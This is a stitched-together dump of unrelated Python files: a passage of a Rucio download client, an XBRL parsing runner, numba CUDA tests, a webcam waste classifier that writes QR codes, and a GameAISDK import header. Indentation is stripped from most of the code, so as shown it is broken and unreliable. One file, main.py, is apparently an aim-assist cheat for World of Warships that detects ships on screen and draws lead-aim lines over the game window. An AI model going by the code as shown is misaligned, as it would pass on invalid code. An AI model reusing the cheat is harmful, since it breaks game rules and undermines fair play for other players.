# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# list of all file item objects
all_file_items = []
        # cea -> client_extract archives to avoid confusion with archives that don't need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_input_dids = set(did_to_options.keys())
all_dest_file_paths = set()
# get replicas for every file of the given dids
logger.debug('num list_replicas calls: %d' % len(merged_items_with_sources))
for file_items in merged_items_with_sources:
all_file_items.extend(file_items)
for file_item in file_items:
# parent_dids contains all parents, so we take the intersection with the input dids
dataset_did_strs = file_item.setdefault('parent_dids', set())
dataset_did_strs.intersection_update(all_input_dids)
file_did_str = file_item['did']
file_did_scope, file_did_name = self._split_did_str(file_did_str)
file_item['scope'] = file_did_scope
file_item['name'] = file_did_name
logger.debug('Queueing file: %s' % file_did_str)
logger.debug('real parents: %s' % dataset_did_strs)
logger.debug('options: %s' % did_to_options)
# prepare destinations:
# if datasets were given: prepare the destination paths for each dataset
options = None
dest_file_paths = file_item.get('dest_file_paths', set())
for dataset_did_str in dataset_did_strs:
options = did_to_options.get(dataset_did_str)
if not options:
logger.error('No input options available for %s' % dataset_did_str)
continue
destinations = options['destinations']
dataset_scope, dataset_name = self._split_did_str(dataset_did_str)
paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', dataset_scope)
file_item.setdefault('dataset_name', dataset_name)
# if no datasets were given only prepare the given destination paths
if len(dataset_did_strs) == 0:
options = did_to_options.get(file_did_str)
if not options:
logger.error('No input options available for %s' % file_did_str)
continue
destinations = options['destinations']
paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
if options is None:
continue
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
                # the file DID string is not a unique key for this dict because multiple calls of list_replicas
                # could return the same DID multiple times, so we use the id() of the dictionary objects instead
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
                            # workaround: since we don't have the archive DID, use the part behind the last slash of the PFN
                            # this does not respect the scope of the archive DID!!!
                            # and we trust that client_extract==True sources don't have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger.debug('client_extract=True; ignoring source: %s' % source['pfn'])
logger.debug('Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger.debug('Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger.debug('Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger.debug('Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger.debug('Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
                # don't move from the mixed list to the pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in all_file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger.debug('Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger.debug('Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
            # if all files of this archive are available in more than one archive, the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger.debug('Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in all_file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, cea_id, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
                            'merged_options': {'ignore_checksum': True},  # we currently don't have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
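    # Summary of the client_extract (cea) bookkeeping above: files whose best source is an
    # archive go into the 'pure' map and are fetched via that archive; files that also have
    # direct sources start in the 'mixed' map and are only promoted to an archive download
    # when the archive is needed anyway or at least use_cea_threshold files share it.
    # Redundant archives are then dropped and every remaining file is pinned to exactly one
    # archive, which becomes a download pack listing the file under 'archive_items'.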
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
        :param did_str: the DID string that will be split
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
            raise InputValidationError('%s is not a valid DID. Too many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
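    # Illustrative examples (assuming the rules implemented above): 'user.jdoe:data.root'
    # splits into ('user.jdoe', 'data.root'); the scope-less form 'user.jdoe.data.root'
    # derives the scope from the first two dot-separated tokens because it starts with
    # 'user', giving ('user.jdoe', 'user.jdoe.data.root'); a trailing '/' is stripped
    # from the name.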
def _prepare_dest_dir(self, base_dir, dest_dir_name, file_name, no_subdir):
"""
Builds the final destination path for a file and:
1. deletes existing files if no_subdir was given
2. creates the destination directory if it's not existent
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param file_name: name of the file that will be downloaded
:param no_subdir: if no subdirectory should be created
        :returns: the absolute path of the destination directory
"""
dest_dir_path = os.path.abspath(base_dir)
# if no subdirectory is used, existing files will be overwritten
if no_subdir:
dest_file_path = os.path.join(dest_dir_path, file_name)
if os.path.isfile(dest_file_path):
self.logger.debug('Deleting existing file: %s' % dest_file_path)
os.remove(dest_file_path)
else:
dest_dir_path = os.path.join(dest_dir_path, dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
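    # Illustrative example (following the logic above): with base_dir='/data',
    # dest_dir_name='dataset1' and no_subdir=False the directory '/data/dataset1' is
    # created if missing and returned; with no_subdir=True an already existing
    # '/data/<file_name>' is deleted first and '/data' itself is returned.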
def _check_output(self, output_items):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if num_successful == 0:
raise NoFilesDownloaded()
elif num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
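    # Example of the failure semantics above: if every output item ends in a failure state
    # (e.g. 'FAILED' or 'FILE_NOT_FOUND') NoFilesDownloaded is raised; a mix of successful
    # states ('DONE', 'ALREADY_DONE', 'FOUND_IN_PCACHE') and failed items raises
    # NotAllFilesDownloaded; only an all-successful list is returned unchanged.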
def _send_trace(self, trace):
"""
Checks if sending trace is allowed and send the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.host, self.client.user_agent)
|
xbrl_run.py
|
# -*- coding: utf-8 -*-
import os
import time
from pathlib import Path
import multiprocessing
import json
import codecs
import pickle
from multiprocessing import Process, Array
from xbrl_reader import Inf, SchemaElement, Calc, init_xbrl_reader, read_company_dic, readXbrlThread, make_public_docs_list
start_time = time.time()
def f(cpu_count, cpu_id, public_docs_list, progress, company_dic):
readXbrlThread(cpu_count, cpu_id, public_docs_list, progress, company_dic)
if __name__ == '__main__':
init_xbrl_reader()
company_dic = read_company_dic()
cpu_count = multiprocessing.cpu_count()
progress = Array('i', [0] * cpu_count)
public_docs_list = make_public_docs_list(cpu_count, company_dic)
process_list = []
for cpu_id in range(cpu_count):
p = Process(target=readXbrlThread, args=(cpu_count, cpu_id, public_docs_list[cpu_id], progress, company_dic))
process_list.append(p)
p.start()
for p in process_list:
p.join()
    print('Finished: %d' % int(time.time() - start_time))
|
main.py
|
import win32api
import win32gui
import win32ui
import win32con
from PIL import ImageGrab
import PIL
import matplotlib.pyplot as plt
import numpy as np
import time
import torch
import torch.backends.cudnn as cudnn
from digitTrain import MyModel
from digitTrain import MyDataSet
import sys
from multiprocessing import Process, Queue
sys.path.append('yolov5-master')
from models.common import DetectMultiBackend
from utils.datasets import IMG_FORMATS, VID_FORMATS, LoadImages, LoadStreams
from utils.general import (LOGGER, check_file, check_img_size, check_imshow, check_requirements, colorstr,
increment_path, non_max_suppression, print_args, scale_coords, strip_optimizer, xyxy2xywh)
from utils.plots import Annotator, colors, save_one_box
from utils.torch_utils import select_device, time_sync
from multiprocessing import Process, Queue
def DetectProcess(q):
print("proc start")
width = 7
height = 11
yLoc = 557
xLocs = (877,884,895,902)
digitModel = MyModel.load_from_checkpoint("digit.ckpt")
digitModel.cuda()
digitModel.eval()
device = select_device('0')
model = DetectMultiBackend('best.pt', device=device, dnn=False, data='')
stride, names, pt, jit, onnx, engine = model.stride, model.names, model.pt, model.jit, model.onnx, model.engine
imgsz = check_img_size((640,640), s=stride)
model.model.float()
model.warmup(imgsz=(1, 3, *imgsz), half=False)
while True:
item = {}
item["rects"] = []
item["leads"] = []
img_ready = ImageGrab.grab((0, 0, 1920, 1080))
img_arr = np.array(img_ready)
digits = np.zeros((0,height,width,3))
for x in xLocs:
digit = img_arr[yLoc:yLoc+height, x:x+width, :].reshape(1,height,width,3)
digits = np.concatenate((digits,digit),axis = 0)
torch_digits = torch.Tensor((digits/255-0.5)*2)
digit_result = torch.argmax(digitModel.model(torch_digits.cuda()),dim = 1)
num_result = np.array(digit_result.cpu())
txt = ""
for i in range(len(num_result)):
num = num_result[i]
if num == 10:
num = 0
txt += str(num)
if(i==1):
txt += "."
y = yLoc+height+2
x = xLocs[0]
seconds = float(txt)
lead = seconds/3.6
item["textArgs"] = txt,5,(x,y,x+width*5,y+height),win32con.DT_TOP
y = y+height+2
item["leadArgs"] = str(lead),3,(x+width,y,x+width*4,y+height),win32con.DT_TOP
screen_arr = np.array(img_ready.resize((640,640),PIL.Image.BICUBIC)).transpose((2,0,1))
screen_arr = np.ascontiguousarray(screen_arr)/255.0
screen_arr = screen_arr[None]
pred = model(torch.from_numpy(screen_arr).cuda().float(), augment=False, visualize=False)
pred = non_max_suppression(pred, 0.25, 0.45, None, False, max_det=50)
for i, det in enumerate(pred): # per image
if len(det):
# Rescale boxes from img_size to im0 size
#det[:, :4] = scale_coords((640,640), det[:, :4], (1080,1920)).round()
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
# Write results
for *xyxy, conf, cls in reversed(det):
xyxy[0] = (xyxy[0]/640*1920).round()
xyxy[1] = (xyxy[1]/640*1080).round()
xyxy[2] = (xyxy[2]/640*1920).round()
xyxy[3] = (xyxy[3]/640*1080).round()
item["rects"] += [[int(xyxy[0]),int(xyxy[1]),int(xyxy[2]),int(xyxy[3])]]
length = float(xyxy[2]-xyxy[0])*lead
h = (xyxy[3]-xyxy[1])*2
if cls < 0.5:
realLead = (xyxy[2]+length).round()
item["leads"] += [[int(realLead),int(h),int(xyxy[2]),int(xyxy[3])]]
else:
realLead = (xyxy[0]-length).round()
item["leads"] += [[int(realLead),int(h),int(xyxy[2]),int(xyxy[3])]]
if(q.empty()):
q.put(item)
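# Note on the hand-off above: DetectProcess only enqueues a new item when the queue is
# empty, so the drawing loop in __main__ always works on the most recent completed frame
# and stale detections are simply dropped instead of piling up.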
def myDrawRectangle(hdc, x1, y1, x2, y2):
win32gui.Polyline(hdc, ((x1,y1),(x1,y2),(x2,y2),(x2,y1),(x1,y1)))
def myDrawLead(hdc,realLead,height,x,y):
win32gui.Polyline(hdc, ((x,y),(realLead,y)))
win32gui.Polyline(hdc, ((realLead,y),(realLead,y+height)))
if __name__ == "__main__":
hwnd = win32gui.FindWindow(None, "《戰艦世界》")
hdc = win32gui.GetDC(hwnd)
#hdc = win32gui.GetDC(0)
hpen = win32gui.CreatePen(win32con.PS_GEOMETRIC,2, win32api.RGB(255,0,0))
win32gui.SelectObject(hdc,hpen)
win32gui.SetTextColor(hdc, win32api.RGB(255,255,255))
win32gui.SetBkColor(hdc,win32api.RGB(0,0,0))
font = win32ui.CreateFont({'height':11,'width':7})
win32gui.SelectObject(hdc,font.GetSafeHandle())
q = Queue()
item = None
    procDetect = Process(target=DetectProcess, args=(q,))
    procDetect.start()
while True:
if not q.empty():
item = q.get(True)
if item:
win32gui.DrawText(hdc, *item["textArgs"])
win32gui.DrawText(hdc, *item["leadArgs"])
for i in range(len(item["rects"])):
myDrawRectangle(hdc,*(item["rects"][i]))
myDrawLead(hdc,*(item["leads"][i]))
|
test_dispatcher.py
|
import numpy as np
import threading
from numba import cuda, float32, float64, int32, int64, void
from numba.core.errors import NumbaDeprecationWarning
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
import math
def add(x, y):
return x + y
def add_kernel(r, x, y):
r[0] = x + y
@skip_on_cudasim('Dispatcher objects not used in the simulator')
class TestDispatcher(CUDATestCase):
def _test_no_double_specialize(self, dispatcher, ty):
with self.assertRaises(RuntimeError) as e:
dispatcher.specialize(ty)
self.assertIn('Dispatcher already specialized', str(e.exception))
def test_no_double_specialize_sig_same_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit('void(float32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_same_types(self):
# Attempting to specialize an already-specialized kernel is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(float32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_no_double_specialize_sig_diff_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal.
@cuda.jit('void(int32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_diff_types(self):
# Attempting to specialize an already-specialized kernel is illegal.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(int32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_specialize_cache_same(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types.
@cuda.jit
def f(x):
pass
self.assertEqual(len(f.specializations), 0)
f_float32 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
f_float32_2 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
self.assertIs(f_float32, f_float32_2)
f_int32 = f.specialize(int32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_int32, f_float32)
def test_specialize_cache_same_with_ordering(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types, taking into account array ordering and multiple
# arguments.
@cuda.jit
def f(x, y):
pass
self.assertEqual(len(f.specializations), 0)
# 'A' order specialization
f_f32a_f32a = f.specialize(float32[:], float32[:])
self.assertEqual(len(f.specializations), 1)
# 'C' order specialization
f_f32c_f32c = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_f32a_f32a, f_f32c_f32c)
# Reuse 'C' order specialization
f_f32c_f32c_2 = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIs(f_f32c_f32c, f_f32c_f32c_2)
# The following tests are based on those in numba.tests.test_dispatcher
def test_coerce_input_types(self):
# Do not allow unsafe conversions if we can still compile other
# specializations.
c_add = cuda.jit(add_kernel)
# Using a complex128 allows us to represent any result produced by the
# test
r = np.zeros(1, dtype=np.complex128)
c_add[1, 1](r, 123, 456)
self.assertEqual(r[0], add(123, 456))
c_add[1, 1](r, 12.3, 45.6)
self.assertEqual(r[0], add(12.3, 45.6))
c_add[1, 1](r, 12.3, 45.6j)
self.assertEqual(r[0], add(12.3, 45.6j))
c_add[1, 1](r, 12300000000, 456)
self.assertEqual(r[0], add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 123, 456)
self.assertPreciseEqual(r[0], add(123, 456))
@unittest.expectedFailure
def test_coerce_input_types_unsafe(self):
# Implicit (unsafe) conversion of float to int, originally from
# test_coerce_input_types. This test presently fails with the CUDA
# Dispatcher because argument preparation is done by
# _Kernel._prepare_args, which is currently inflexible with respect to
# the types it can accept when preparing.
#
# This test is marked as xfail until future changes enable this
# behavior.
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 12.3, 45.6)
self.assertPreciseEqual(r[0], add(12, 45))
def test_coerce_input_types_unsafe_complex(self):
# Implicit conversion of complex to int disallowed
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
with self.assertRaises(TypeError):
c_add[1, 1](r, 12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
c_add = cuda.jit(add_kernel)
r = np.zeros(1, dtype=np.float64)
INT = 1
FLT = 1.5
c_add[1, 1](r, INT, FLT)
self.assertAlmostEqual(r[0], INT + FLT)
self.assertEqual(len(c_add.overloads), 1)
c_add[1, 1](r, FLT, INT)
self.assertAlmostEqual(r[0], FLT + INT)
self.assertEqual(len(c_add.overloads), 2)
c_add[1, 1](r, FLT, FLT)
self.assertAlmostEqual(r[0], FLT + FLT)
self.assertEqual(len(c_add.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
c_add[1, 1](r, 1, 1)
self.assertAlmostEqual(r[0], INT + INT)
self.assertEqual(len(c_add.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@cuda.jit
def foo(r, x):
r[0] = x + 1
def wrapper():
try:
r = np.zeros(1, dtype=np.int64)
foo[1, 1](r, 1)
self.assertEqual(r[0], 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_get_regs_per_thread_unspecialized(self):
# A kernel where the register usage per thread is likely to differ
# between different specializations
@cuda.jit
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Call the kernel with different arguments to create two different
# definitions within the Dispatcher object
N = 10
arr_f32 = np.zeros(N, dtype=np.float32)
arr_f64 = np.zeros(N, dtype=np.float64)
pi_sin_array[1, N](arr_f32, N)
pi_sin_array[1, N](arr_f64, N)
# Check we get a positive integer for the two different variations
sig_f32 = void(float32[::1], int64)
sig_f64 = void(float64[::1], int64)
regs_per_thread_f32 = pi_sin_array.get_regs_per_thread(sig_f32)
regs_per_thread_f64 = pi_sin_array.get_regs_per_thread(sig_f64)
self.assertIsInstance(regs_per_thread_f32, int)
self.assertIsInstance(regs_per_thread_f64, int)
self.assertGreater(regs_per_thread_f32, 0)
self.assertGreater(regs_per_thread_f64, 0)
# Check that getting the registers per thread for all signatures
# provides the same values as getting the registers per thread for
# individual signatures.
regs_per_thread_all = pi_sin_array.get_regs_per_thread()
self.assertEqual(regs_per_thread_all[sig_f32.args],
regs_per_thread_f32)
self.assertEqual(regs_per_thread_all[sig_f64.args],
regs_per_thread_f64)
if regs_per_thread_f32 == regs_per_thread_f64:
# If the register usage is the same for both variants, there may be
# a bug, but this may also be an artifact of the compiler / driver
# / device combination, so produce an informational message only.
print('f32 and f64 variant thread usages are equal.')
print('This may warrant some investigation. Devices:')
cuda.detect()
def test_get_regs_per_thread_specialized(self):
@cuda.jit(void(float32[::1], int64))
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Check we get a positive integer for the specialized variation
regs_per_thread = pi_sin_array.get_regs_per_thread()
self.assertIsInstance(regs_per_thread, int)
self.assertGreater(regs_per_thread, 0)
def test_deprecated_definitions(self):
@cuda.jit(void(int64[::1]))
def foo(x):
x[0] = 0
with self.assertWarns(NumbaDeprecationWarning) as warns:
foo.definition
self.assertEqual(len(warns.warnings), 1)
s = str(warns.warnings[0])
self.assertIn('Use overloads instead of definition', s)
self.assertNotIn('definitions', s)
with self.assertWarns(NumbaDeprecationWarning) as warns:
foo.definitions
self.assertEqual(len(warns.warnings), 1)
s = str(warns.warnings[0])
self.assertIn('Use overloads instead of definitions', s)
if __name__ == '__main__':
unittest.main()
|
face_detection.py
|
# MIT License
#
# Copyright (c) 2019 Jian James Astrero
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import argparse
import threading
import time
import numpy as np
import tensorflow as tf
import qrcode as qr
from PIL import Image
def main():
# database = prepare_database()
webcam_face_recognizer()
return
model_file = "../tf_files/retrained_graph.pb"
label_file = "../tf_files/retrained_labels.txt"
input_height = 299
input_width = 299
input_mean = 0
input_std = 255
input_layer = "Placeholder"
output_layer = "final_result"
is_processing = False
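# is_processing acts as a crude re-entrancy guard: webcam frames grabbed while a
# classification is still running are dropped, so at most one TensorFlow session is
# active at a time.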
def webcam_face_recognizer():
"""
Runs a loop that extracts images from the computer's webcam and determines whether or not
it contains the face of a person in our database.
If it contains a face, an audio message will be played welcoming the user.
If not, the program will process the next frame from the webcam
"""
cv2.namedWindow("WebCam Video Feed")
vc = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('../haarcascade_frontalface_default.xml')
while vc.isOpened():
_, frame = vc.read()
img = frame
# We do not want to detect a new identity while the program is in the process of identifying another person
# if ready_to_detect_identity:
# img = process_frame(img, frame, face_cascade, database)
process_image_thread = threading.Thread(target=process_image, args=(img,))
process_image_thread.start()
key = cv2.waitKey(100)
cv2.imshow("preview", img)
if key == 27: # exit on ESC
break
cv2.destroyWindow("WebCam Video Feed")
def load_graph(model_file):
graph = tf.Graph()
graph_def = tf.GraphDef()
with open(model_file, "rb") as f:
graph_def.ParseFromString(f.read())
with graph.as_default():
tf.import_graph_def(graph_def)
return graph
def read_tensor_from_image(image,
input_height=299,
input_width=299,
input_mean=0,
input_std=255):
input_name = "file_reader"
output_name = "normalized"
image_reader = image
float_caster = tf.cast(image_reader, tf.float32)
dims_expander = tf.expand_dims(float_caster, 0)
resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
sess = tf.Session()
result = sess.run(normalized)
return result
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
def process_image(img):
global is_processing
if not is_processing:
is_processing = True
graph = load_graph(model_file)
input_name = "import/" + input_layer
output_name = "import/" + output_layer
input_operation = graph.get_operation_by_name(input_name)
output_operation = graph.get_operation_by_name(output_name)
t = read_tensor_from_image(
img,
input_height=input_height,
input_width=input_width,
input_mean=input_mean,
input_std=input_std)
with tf.Session(graph=graph) as sess:
results = sess.run(output_operation.outputs[0], {
input_operation.outputs[0]: t
})
results = np.squeeze(results)
top_k = results.argsort()[-5:][::-1]
labels = load_labels(label_file)
identity = ""
for i in top_k:
if identity == "":
identity = labels[i]
print(labels[i], results[i])
print("-------------identified as: " + identity)
amount = "0"
if identity == "trash":
amount = "1"
elif identity == "paper":
amount = "5"
elif identity == "plastic":
amount = "10"
elif identity == "metal":
amount = "15"
img = qr.make(amount)
print(type(img))
print(img.size)
img.save("../qr.png")
image = Image.open("../qr.png")
image.show()
time.sleep(10)
is_processing = False
main()
|
train_node.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import re
import logging
import time
import traceback
import os
from collections import OrderedDict
import urllib.request
import threading
import platform
import matplotlib.pyplot as plot
import numpy
from PyQt5.QtCore import QObject, Qt, pyqtSignal
from PyQt5.QtWidgets import QComboBox, QTreeWidgetItem
from ...canvas.data_source import DataSource
from ...main_window.tool_window import ui
